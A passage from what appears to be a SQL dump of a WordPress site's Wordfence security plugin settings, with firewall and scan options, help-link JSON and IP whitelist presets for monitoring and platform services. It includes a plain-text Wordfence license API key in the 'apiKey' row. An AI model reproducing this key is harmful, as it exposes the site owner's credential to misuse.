2x.png\n/browserconfig.xml','yes'),('wafAlertWhitelist','','yes'),('wafAlertInterval','600','yes'),('wafAlertThreshold','100','yes'),('howGetIPs_trusted_proxies','','yes'),('scanType','standard','yes'),('manualScanType','onceDaily','yes'),('schedStartHour','20','yes'),('schedMode','auto','yes'),('cbl_loggedInBlocked','','yes'),('cbl_action','block','yes'),('cbl_redirURL','','yes'),('cbl_bypassRedirURL','','yes'),('cbl_bypassRedirDest','','yes'),('cbl_bypassViewURL','','yes'),('loginSec_enableSeparateTwoFactor','','yes'),('blockCustomText','','yes'),('alertOn_severityLevel','25','yes'),('apiKey','a3efc70cd6788bcbd5f1c8a69ed29fd0e425539e7789cc450d2da620e5e7c733e1e52567d191e97bcccfe315ca1313d002f13ce1ca1fde09cc7a8259127bb592','yes'),('keyType','free','yes'),('isPaid','','yes'),('hasKeyConflict','0','yes'),('timeoffset_wf_updated','1705057866','yes'),('cacheType','disabled','yes'),('detectProxyRecommendation','HTTP_CF_CONNECTING_IP','no'),('dismissAutoPrependNotice','0','yes'),('onboardingAttempt1','skipped','yes'),('onboardingAttempt2','','no'),('onboardingAttempt3','','no'),('onboardingAttempt3Initial','0','yes'),('onboardingDelayedAt','0','yes'),('needsNewTour_dashboard','0','yes'),('needsNewTour_firewall','1','yes'),('needsNewTour_scan','1','yes'),('needsNewTour_blocking','1','yes'),('needsNewTour_livetraffic','1','yes'),('needsNewTour_loginsecurity','0','yes'),('needsUpgradeTour_dashboard','0','yes'),('needsUpgradeTour_firewall','0','yes'),('needsUpgradeTour_scan','0','yes'),('needsUpgradeTour_blocking','0','yes'),('needsUpgradeTour_livetraffic','0','yes'),('needsUpgradeTour_loginsecurity','0','yes'),('supportContent','{\"top\":[{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":0},{\"title\":\"Optimizing The Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":1},{\"title\":\"Wordfence Web Application Firewall (WAF)\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"order\":2},{\"title\":\"Scan Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3},{\"title\":\"Wordfence and LiteSpeed\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/litespeed\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Firewall Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":6},{\"title\":\"Scan Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":7},{\"title\":\"I am locked out of my site\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/#i-am-locked-out-of-my-site\",\"order\":8},{\"title\":\"PHP Fatal error: Failed opening required wordfence-waf.php\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/#php-fatal-error-failed-opening-required-wordfence-waf-php\",\"order\":9}],\"all\":[{\"title\":\"Wordfence Free\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-free\\/\",\"excerpt\":\"Wordfence Free is an all-in-one security solution for WordPress websites that includes an endpoint firewall, security scanner, login security, alerts, centralized management, and more.\",\"order\":0},{\"title\":\"Wordfence Premium\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-premium\\/\",\"excerpt\":\"Wordfence Premium comes with real-time firewall protection, real-time scan signatures, an IP address blocklist, country blocking, and Premium support.\",\"order\":1},{\"title\":\"Wordfence Care\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-care\\/\",\"excerpt\":\"Wordfence Care is for business owners who place a premium on their time. Our team installs, configures, optimizes, and maintains your WordPress site security.\",\"order\":2},{\"title\":\"Wordfence Response\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-response\\/\",\"excerpt\":\"Wordfence Response is for mission-critical WordPress websites that require 24\\/7\\/365 security monitoring with a 1-hour response time and 24-hour remediation.\",\"order\":3},{\"title\":\"Incident Response Services\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/incident-response-services\\/\",\"excerpt\":\"Let one of our Security Analysts help you clean your infected site or inspect it for vulnerabilities.\",\"order\":4},{\"title\":\"License Key\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/api-key\\/\",\"excerpt\":\"All Wordfence installations need a license key, also known as an API-key. The key can be a free key or a Premium key. \",\"order\":5},{\"title\":\"Account and Billing History\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/account\\/\",\"excerpt\":\"How to navigate and use your Wordfence account.\",\"order\":6},{\"title\":\"Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/\",\"excerpt\":\"Wordfence Central provides a powerful and efficient way to manage the security of many WordPress sites via a single interface.\",\"children\":[{\"title\":\"Connecting your sites to Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/connect\\/\",\"order\":0},{\"title\":\"Setting up two-factor authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/2fa\\/\",\"order\":1},{\"title\":\"Using the Dashboard page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/central\\/\",\"order\":2},{\"title\":\"Using the Configuration page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/configuration\\/\",\"order\":3},{\"title\":\"Using Wordfence plugin options Templates\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/templates\\/\",\"order\":4},{\"title\":\"Viewing scan Findings\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/findings\\/\",\"order\":5},{\"title\":\"Using the Settings page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/settings\\/\",\"order\":6},{\"title\":\"Using Wordfence Central Teams\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/teams\\/\",\"order\":7}],\"order\":7},{\"title\":\"Dashboard\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/\",\"excerpt\":\"The Wordfence Dashboard provides insight into the current state of your site’s security.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/options\\/\",\"order\":0},{\"title\":\"Alerts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/alerts\\/\",\"order\":1}],\"order\":8},{\"title\":\"Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"excerpt\":\"The Wordfence Web Application Firewall is a PHP based, application level firewall that filters out malicious requests to your site. \",\"children\":[{\"title\":\"Optimizing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":0},{\"title\":\"Statistics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/statistics\\/\",\"order\":1},{\"title\":\"Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":2},{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/options\\/\",\"order\":3},{\"title\":\"MySQLi storage engine\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/mysqli-storage-engine\\/\",\"order\":4},{\"title\":\"Brute Force Protection\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/brute-force\\/\",\"order\":5},{\"title\":\"Rate Limiting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/rate-limiting\\/\",\"order\":6},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/troubleshooting\\/\",\"order\":7}],\"order\":9},{\"title\":\"Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/\",\"excerpt\":\"Aside from the firewall rules that protect against various attacks, Wordfence also has custom features for additional blocking. \",\"children\":[{\"title\":\"Country Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/country-blocking\\/\",\"order\":0},{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":1}],\"order\":10},{\"title\":\"Scan\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/\",\"excerpt\":\"A Wordfence scan examines all files on your WordPress website looking for malicious code, backdoors, and shells that hackers have installed. It also scans for known malicious URLs and known patterns of infections.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/options\\/\",\"order\":0},{\"title\":\"Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":1},{\"title\":\"Scheduling\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scheduling\\/\",\"order\":2},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3}],\"order\":11},{\"title\":\"Tools\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/\",\"excerpt\":\"Wordfence Tools include Live Traffic analysis, WHOIS Lookup, Import\\/Export Options, and Diagnostics.\",\"children\":[{\"title\":\"Live Traffic\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/live-traffic\\/\",\"order\":0},{\"title\":\"WHOIS Lookup\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/whois-lookup\\/\",\"order\":1},{\"title\":\"Import\\/Export\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/import-export\\/\",\"order\":2},{\"title\":\"Diagnostics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/diagnostics\\/\",\"order\":3},{\"title\":\"Legacy Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/legacy-two-factor-authentication\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5}],\"order\":12},{\"title\":\"Login Security\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security\\/\",\"excerpt\":\"The Login Security page currently contains settings for two-factor authentication (2FA) and reCAPTCHA. In a future Wordfence version, existing login-related features will also move to the same page.\",\"order\":13},{\"title\":\"Advanced\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/\",\"excerpt\":\"If you want to know more about the technical details of Wordfence, you will find the answers in this section.\",\"children\":[{\"title\":\"Changelog\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/changelog\\/\",\"order\":0},{\"title\":\"Technical Details\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/technical-details\\/\",\"order\":1},{\"title\":\"Constants\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/constants\\/\",\"order\":2},{\"title\":\"Remove or Reset\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/remove-or-reset\\/\",\"order\":3},{\"title\":\"System requirements\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/\",\"order\":4},{\"title\":\"Compatibility\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/compatibility\\/\",\"order\":5},{\"title\":\"Wordfence API\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/wordfence-api\\/\",\"order\":6},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/troubleshooting\\/\",\"order\":7},{\"title\":\"Plugin \\/ Theme Conflicts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/plugin-theme-conflicts\\/\",\"order\":8}],\"order\":14},{\"title\":\"Wordfence and GDPR - General Data Protection Regulation\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/\",\"excerpt\":\"Defiant, the company behind Wordfence, has updated its terms of use, privacy policies and software, as well as made available standard contractual clauses to meet GDPR compliance. Customers must review and agree to updated terms in order to continue using our products and services.\",\"children\":[{\"title\":\"Sub-Processors List\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/sub-processors-list\\/\",\"order\":0}],\"order\":15},{\"title\":\"Login Security Plugin\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security-plugin\\/\",\"excerpt\":\"The Wordfence Login Security plugin contains a subset of the features found in the full Wordfence plugin: Two-factor Authentication, XML-RPC Protection and Login Page CAPTCHA. It is ideal for sites that need login security functionality but either can’t or don’t want to run the full Wordfence plugin.\",\"order\":16},{\"title\":\"Wordfence Intelligence\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-intelligence\\/\",\"excerpt\":\"Wordfence Intelligence is an industry-leading WordPress vulnerability database and evolving Threat Intelligence platform that contains over 12,000 records for vulnerabilities in WordPress plugins, themes, and core.\",\"children\":[{\"title\":\"V2: Accessing and Consuming the Vulnerability Data Feed\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-intelligence\\/v2-accessing-and-consuming-the-vulnerability-data-feed\\/\",\"order\":0},{\"title\":\"V1: Accessing and Consuming the Vulnerability Data Feed\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-intelligence\\/accessing-and-consuming-the-vulnerability-data-feed\\/\",\"order\":1},{\"title\":\"Wordfence Intelligence Webhook Notifications\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/wordfence-intelligence\\/wordfence-intelligence-webhook-notifications\\/\",\"order\":2}],\"order\":17}]}','yes'),('supportHash','b08dc0902cf6fee340fe72de085ba1e37233c761a0f6c4b950152647b3a5abb8','yes'),('whitelistPresets','{\"wordfence\":{\"n\":\"Wordfence\",\"h\":true,\"d\":true,\"f\":true,\"r\":[\"54.68.32.247\",\"69.46.36.0\\/27\",\"2605:2400:0104:0100::\\/56\"]},\"sucuri\":{\"n\":\"Sucuri\",\"d\":true,\"r\":[\"97.74.127.171\",\"69.164.203.172\",\"173.230.128.135\",\"66.228.34.49\",\"66.228.40.185\",\"50.116.36.92\",\"50.116.36.93\",\"50.116.3.171\",\"198.58.96.212\",\"50.116.63.221\",\"192.155.92.112\",\"192.81.128.31\",\"198.58.106.244\",\"192.155.95.139\",\"23.239.9.227\",\"198.58.112.103\",\"192.155.94.43\",\"162.216.16.33\",\"173.255.233.124\",\"173.255.233.124\",\"192.155.90.179\",\"50.116.41.217\",\"192.81.129.227\",\"198.58.111.80\",\"162.216.19.183\"]},\"facebook\":{\"n\":\"Facebook\",\"d\":true,\"r\":[\"69.63.176.0\\/20\",\"66.220.144.0\\/20\",\"66.220.144.0\\/21\",\"69.63.184.0\\/21\",\"69.63.176.0\\/21\",\"74.119.76.0\\/22\",\"69.171.255.0\\/24\",\"173.252.64.0\\/18\",\"69.171.224.0\\/19\",\"69.171.224.0\\/20\",\"103.4.96.0\\/22\",\"69.63.176.0\\/24\",\"173.252.64.0\\/19\",\"173.252.70.0\\/24\",\"31.13.64.0\\/18\",\"31.13.24.0\\/21\",\"66.220.152.0\\/21\",\"66.220.159.0\\/24\",\"69.171.239.0\\/24\",\"69.171.240.0\\/20\",\"31.13.64.0\\/19\",\"31.13.64.0\\/24\",\"31.13.65.0\\/24\",\"31.13.67.0\\/24\",\"31.13.68.0\\/24\",\"31.13.69.0\\/24\",\"31.13.70.0\\/24\",\"31.13.71.0\\/24\",\"31.13.72.0\\/24\",\"31.13.73.0\\/24\",\"31.13.74.0\\/24\",\"31.13.75.0\\/24\",\"31.13.76.0\\/24\",\"31.13.77.0\\/24\",\"31.13.96.0\\/19\",\"31.13.66.0\\/24\",\"173.252.96.0\\/19\",\"69.63.178.0\\/24\",\"31.13.78.0\\/24\",\"31.13.79.0\\/24\",\"31.13.80.0\\/24\",\"31.13.82.0\\/24\",\"31.13.83.0\\/24\",\"31.13.84.0\\/24\",\"31.13.85.0\\/24\",\"31.13.86.0\\/24\",\"31.13.87.0\\/24\",\"31.13.88.0\\/24\",\"31.13.89.0\\/24\",\"31.13.90.0\\/24\",\"31.13.91.0\\/24\",\"31.13.92.0\\/24\",\"31.13.93.0\\/24\",\"31.13.94.0\\/24\",\"31.13.95.0\\/24\",\"69.171.253.0\\/24\",\"69.63.186.0\\/24\",\"31.13.81.0\\/24\",\"179.60.192.0\\/22\",\"179.60.192.0\\/24\",\"179.60.193.0\\/24\",\"179.60.194.0\\/24\",\"179.60.195.0\\/24\",\"185.60.216.0\\/22\",\"45.64.40.0\\/22\",\"185.60.216.0\\/24\",\"185.60.217.0\\/24\",\"185.60.218.0\\/24\",\"185.60.219.0\\/24\",\"129.134.0.0\\/16\",\"157.240.0.0\\/16\",\"157.240.8.0\\/24\",\"157.240.0.0\\/24\",\"157.240.1.0\\/24\",\"157.240.2.0\\/24\",\"157.240.3.0\\/24\",\"157.240.4.0\\/24\",\"157.240.5.0\\/24\",\"157.240.6.0\\/24\",\"157.240.7.0\\/24\",\"157.240.9.0\\/24\",\"157.240.10.0\\/24\",\"157.240.16.0\\/24\",\"157.240.19.0\\/24\",\"157.240.11.0\\/24\",\"157.240.12.0\\/24\",\"157.240.13.0\\/24\",\"157.240.14.0\\/24\",\"157.240.15.0\\/24\",\"157.240.17.0\\/24\",\"157.240.18.0\\/24\",\"157.240.20.0\\/24\",\"157.240.21.0\\/24\",\"157.240.22.0\\/24\",\"157.240.23.0\\/24\",\"157.240.0.0\\/17\",\"69.171.250.0\\/24\",\"157.240.24.0\\/24\",\"157.240.25.0\\/24\",\"199.201.64.0\\/24\",\"199.201.65.0\\/24\",\"199.201.64.0\\/22\",\"204.15.20.0\\/22\",\"157.240.192.0\\/24\",\"129.134.0.0\\/17\",\"204.15.20.0\\/22\",\"69.63.176.0\\/20\",\"69.63.176.0\\/21\",\"69.63.184.0\\/21\",\"66.220.144.0\\/20\",\"69.63.176.0\\/20\",\"2620:0:1c00::\\/40\",\"2a03:2880::\\/32\",\"2a03:2880:fffe::\\/48\",\"2a03:2880:ffff::\\/48\",\"2620:0:1cff::\\/48\",\"2a03:2880:f000::\\/48\",\"2a03:2880:f001::\\/48\",\"2a03:2880:f002::\\/48\",\"2a03:2880:f003::\\/48\",\"2a03:2880:f004::\\/48\",\"2a03:2880:f005::\\/48\",\"2a03:2880:f006::\\/48\",\"2a03:2880:f007::\\/48\",\"2a03:2880:f008::\\/48\",\"2a03:2880:f009::\\/48\",\"2a03:2880:f00a::\\/48\",\"2a03:2880:f00b::\\/48\",\"2a03:2880:f00c::\\/48\",\"2a03:2880:f00d::\\/48\",\"2a03:2880:f00e::\\/48\",\"2a03:2880:f00f::\\/48\",\"2a03:2880:f010::\\/48\",\"2a03:2880:f011::\\/48\",\"2a03:2880:f012::\\/48\",\"2a03:2880:f013::\\/48\",\"2a03:2880:f014::\\/48\",\"2a03:2880:f015::\\/48\",\"2a03:2880:f016::\\/48\",\"2a03:2880:f017::\\/48\",\"2a03:2880:f018::\\/48\",\"2a03:2880:f019::\\/48\",\"2a03:2880:f01a::\\/48\",\"2a03:2880:f01b::\\/48\",\"2a03:2880:f01c::\\/48\",\"2a03:2880:f01d::\\/48\",\"2a03:2880:f01e::\\/48\",\"2a03:2880:f01f::\\/48\",\"2a03:2880:1000::\\/36\",\"2a03:2880:2000::\\/36\",\"2a03:2880:3000::\\/36\",\"2a03:2880:4000::\\/36\",\"2a03:2880:5000::\\/36\",\"2a03:2880:6000::\\/36\",\"2a03:2880:7000::\\/36\",\"2a03:2880:f020::\\/48\",\"2a03:2880:f021::\\/48\",\"2a03:2880:f022::\\/48\",\"2a03:2880:f023::\\/48\",\"2a03:2880:f024::\\/48\",\"2a03:2880:f025::\\/48\",\"2a03:2880:f026::\\/48\",\"2a03:2880:f027::\\/48\",\"2a03:2880:f028::\\/48\",\"2a03:2880:f029::\\/48\",\"2a03:2880:f02b::\\/48\",\"2a03:2880:f02c::\\/48\",\"2a03:2880:f02d::\\/48\",\"2a03:2880:f02e::\\/48\",\"2a03:2880:f02f::\\/48\",\"2a03:2880:f030::\\/48\",\"2a03:2880:f031::\\/48\",\"2a03:2880:f032::\\/48\",\"2a03:2880:f033::\\/48\",\"2a03:2880:f034::\\/48\",\"2a03:2880:f035::\\/48\",\"2a03:2880:f036::\\/48\",\"2a03:2880:f037::\\/48\",\"2a03:2880:f038::\\/48\",\"2a03:2880:f039::\\/48\",\"2a03:2880:f03a::\\/48\",\"2a03:2880:f03b::\\/48\",\"2a03:2880:f03c::\\/48\",\"2a03:2880:f03d::\\/48\",\"2a03:2880:f03e::\\/48\",\"2a03:2880:f03f::\\/48\",\"2401:db00::\\/32\",\"2a03:2880::\\/36\",\"2803:6080::\\/32\",\"2a03:2880:f100::\\/48\",\"2a03:2880:f200::\\/48\",\"2a03:2880:f101::\\/48\",\"2a03:2880:f201::\\/48\",\"2a03:2880:f102::\\/48\",\"2a03:2880:f202::\\/48\",\"2a03:2880:f103::\\/48\",\"2a03:2880:f203::\\/48\",\"2a03:2880:f104::\\/48\",\"2a03:2880:f204::\\/48\",\"2a03:2880:f107::\\/48\",\"2a03:2880:f207::\\/48\",\"2a03:2880:f108::\\/48\",\"2a03:2880:f208::\\/48\",\"2a03:2880:f109::\\/48\",\"2a03:2880:f209::\\/48\",\"2a03:2880:f10a::\\/48\",\"2a03:2880:f20a::\\/48\",\"2a03:2880:f10b::\\/48\",\"2a03:2880:f20b::\\/48\",\"2a03:2880:f10d::\\/48\",\"2a03:2880:f20d::\\/48\",\"2a03:2880:f10e::\\/48\",\"2a03:2880:f20e::\\/48\",\"2a03:2880:f10f::\\/48\",\"2a03:2880:f20f::\\/48\",\"2a03:2880:f110::\\/48\",\"2a03:2880:f210::\\/48\",\"2a03:2880:f111::\\/48\",\"2a03:2880:f211::\\/48\",\"2a03:2880:f112::\\/48\",\"2a03:2880:f212::\\/48\",\"2a03:2880:f114::\\/48\",\"2a03:2880:f214::\\/48\",\"2a03:2880:f115::\\/48\",\"2a03:2880:f215::\\/48\",\"2a03:2880:f116::\\/48\",\"2a03:2880:f216::\\/48\",\"2a03:2880:f117::\\/48\",\"2a03:2880:f217::\\/48\",\"2a03:2880:f118::\\/48\",\"2a03:2880:f218::\\/48\",\"2a03:2880:f119::\\/48\",\"2a03:2880:f219::\\/48\",\"2a03:2880:f11a::\\/48\",\"2a03:2880:f21a::\\/48\",\"2a03:2880:f11f::\\/48\",\"2a03:2880:f21f::\\/48\",\"2a03:2880:f121::\\/48\",\"2a03:2880:f221::\\/48\",\"2a03:2880:f122::\\/48\",\"2a03:2880:f222::\\/48\",\"2a03:2880:f123::\\/48\",\"2a03:2880:f223::\\/48\",\"2a03:2880:f10c::\\/48\",\"2a03:2880:f20c::\\/48\",\"2a03:2880:f126::\\/48\",\"2a03:2880:f226::\\/48\",\"2a03:2880:f105::\\/48\",\"2a03:2880:f205::\\/48\",\"2a03:2880:f125::\\/48\",\"2a03:2880:f225::\\/48\",\"2a03:2880:f106::\\/48\",\"2a03:2880:f206::\\/48\",\"2a03:2880:f11b::\\/48\",\"2a03:2880:f21b::\\/48\",\"2a03:2880:f113::\\/48\",\"2a03:2880:f213::\\/48\",\"2a03:2880:f11c::\\/48\",\"2a03:2880:f21c::\\/48\",\"2a03:2880:f128::\\/48\",\"2a03:2880:f228::\\/48\",\"2a03:2880:f02a::\\/48\",\"2a03:2880:f12a::\\/48\",\"2a03:2880:f22a::\\/48\",\"2a03:2880:f12f::\\/48\",\"2a03:2880:f22f::\\/48\",\"2a03:2880:f11d::\\/48\",\"2a03:2880:f11e::\\/48\",\"2a03:2880:f120::\\/48\",\"2a03:2880:f124::\\/48\",\"2a03:2880:f127::\\/48\",\"2a03:2880:f129::\\/48\",\"2a03:2880:f12b::\\/48\",\"2a03:2880:f12c::\\/48\",\"2a03:2880:f12d::\\/48\",\"2a03:2880:f12e::\\/48\",\"2a03:2880:f130::\\/48\",\"2a03:2880:f131::\\/48\",\"2a03:2880:f132::\\/48\",\"2a03:2880:f133::\\/48\",\"2a03:2880:f134::\\/48\",\"2a03:2880:f135::\\/48\",\"2a03:2880:f136::\\/48\",\"2a03:2880:f137::\\/48\",\"2a03:2880:f138::\\/48\",\"2a03:2880:f139::\\/48\",\"2a03:2880:f13a::\\/48\",\"2a03:2880:f13b::\\/48\",\"2a03:2880:f13c::\\/48\",\"2a03:2880:f13d::\\/48\",\"2a03:2880:f13e::\\/48\",\"2a03:2880:f13f::\\/48\",\"2a03:2880:f21d::\\/48\",\"2a03:2880:f21e::\\/48\",\"2a03:2880:f220::\\/48\",\"2a03:2880:f224::\\/48\",\"2a03:2880:f227::\\/48\",\"2a03:2880:f229::\\/48\",\"2a03:2880:f22b::\\/48\",\"2a03:2880:f22c::\\/48\",\"2a03:2880:f22d::\\/48\",\"2a03:2880:f22e::\\/48\",\"2a03:2880:f230::\\/48\",\"2a03:2880:f231::\\/48\",\"2a03:2880:f232::\\/48\",\"2a03:2880:f233::\\/48\",\"2a03:2880:f234::\\/48\",\"2a03:2880:f235::\\/48\",\"2a03:2880:f236::\\/48\",\"2a03:2880:f237::\\/48\",\"2a03:2880:f238::\\/48\",\"2a03:2880:f239::\\/48\",\"2a03:2880:f23a::\\/48\",\"2a03:2880:f23b::\\/48\",\"2a03:2880:f23c::\\/48\",\"2a03:2880:f23d::\\/48\",\"2a03:2880:f23e::\\/48\",\"2a03:2880:f23f::\\/48\",\"2a03:2880:f0ff::\\/48\",\"2a03:2880:f1ff::\\/48\",\"2a03:2880:f2ff::\\/48\",\"2c0f:ef78:0003::\\/48\"]},\"uptimerobot\":{\"n\":\"Uptime Robot\",\"d\":true,\"r\":[\"69.162.124.224\\/28\",\"63.143.42.240\\/28\"]},\"statuscake\":{\"n\":\"StatusCake\",\"d\":true,\"r\":[\"103.194.112.70\",\"104.131.247.151\",\"104.131.248.65\",\"104.131.248.78\",\"104.156.229.24\",\"104.156.255.184\",\"104.206.168.26\",\"104.238.164.105\",\"107.150.1.135\",\"107.155.104.182\",\"107.155.108.234\",\"107.155.125.29\",\"107.161.28.219\",\"107.170.197.248\",\"107.170.219.46\",\"107.170.227.23\",\"107.170.227.24\",\"107.170.240.141\",\"107.170.53.191\",\"107.191.47.131\",\"107.191.57.237\",\"108.61.119.153\",\"108.61.162.214\",\"108.61.205.201\",\"108.61.212.141\",\"108.61.215.179\",\"125.63.48.239\",\"128.199.222.65\",\"138.197.130.232\",\"138.197.130.235\",\"138.197.140.243\",\"138.204.171.136\",\"138.68.24.115\",\"138.68.24.136\",\"138.68.24.207\",\"138.68.24.60\",\"138.68.80.10\",\"138.68.80.173\",\"139.59.15.79\",\"139.59.155.26\",\"139.59.190.241\",\"139.59.22.109\",\"139.59.26.85\",\"139.59.29.167\",\"149.154.157.61\",\"149.255.59.100\",\"151.236.10.238\",\"151.236.18.80\",\"151.80.175.223\",\"151.80.175.226\",\"154.127.60.23\",\"154.127.60.59\",\"158.255.208.76\",\"159.203.182.22\",\"159.203.182.60\",\"159.203.186.225\",\"159.203.31.18\",\"162.243.247.163\",\"162.243.71.56\",\"162.248.97.72\",\"162.253.64.104\",\"162.253.64.87\",\"176.56.230.110\",\"178.62.101.57\",\"178.62.104.137\",\"178.62.106.84\",\"178.62.109.7\",\"178.62.40.233\",\"178.62.41.44\",\"178.62.41.49\",\"178.62.41.52\",\"178.62.65.162\",\"178.62.71.227\",\"178.62.78.199\",\"178.62.80.93\",\"178.62.86.69\",\"178.73.210.99\",\"181.41.201.117\",\"181.41.214.137\",\"185.112.157.185\",\"185.12.45.70\",\"185.47.129.168\",\"185.60.135.86\",\"188.166.158.224\",\"188.166.253.148\",\"188.226.139.158\",\"188.226.158.160\",\"188.226.169.228\",\"188.226.171.58\",\"188.226.184.152\",\"188.226.185.106\",\"188.226.186.199\",\"188.226.203.84\",\"188.226.247.184\",\"188.68.238.79\",\"192.241.221.11\",\"193.124.178.54\",\"193.124.178.61\",\"193.182.144.105\",\"193.182.144.147\",\"199.167.128.80\",\"209.222.30.242\",\"213.183.56.107\",\"217.148.43.188\",\"217.148.43.202\",\"31.220.7.237\",\"37.157.246.146\",\"37.235.48.42\",\"37.235.52.25\",\"37.235.53.240\",\"37.235.55.205\",\"37.97.188.103\",\"45.32.128.80\",\"45.32.145.79\",\"45.32.151.21\",\"45.32.160.172\",\"45.32.166.195\",\"45.32.171.24\",\"45.32.192.198\",\"45.32.195.186\",\"45.32.195.93\",\"45.32.212.56\",\"45.32.36.158\",\"45.32.7.22\",\"45.63.121.159\",\"45.63.26.78\",\"45.63.51.63\",\"45.63.61.213\",\"45.63.76.68\",\"45.63.78.84\",\"45.63.86.120\",\"45.63.88.213\",\"45.76.1.44\",\"45.76.192.50\",\"45.76.3.112\",\"46.101.0.24\",\"46.101.110.32\",\"46.101.110.43\",\"46.101.110.45\",\"46.101.20.96\",\"46.101.238.182\",\"46.101.238.189\",\"46.101.240.208\",\"46.101.27.186\",\"46.101.61.83\",\"46.101.74.251\",\"5.45.179.103\",\"50.2.139.16\",\"82.221.95.161\",\"91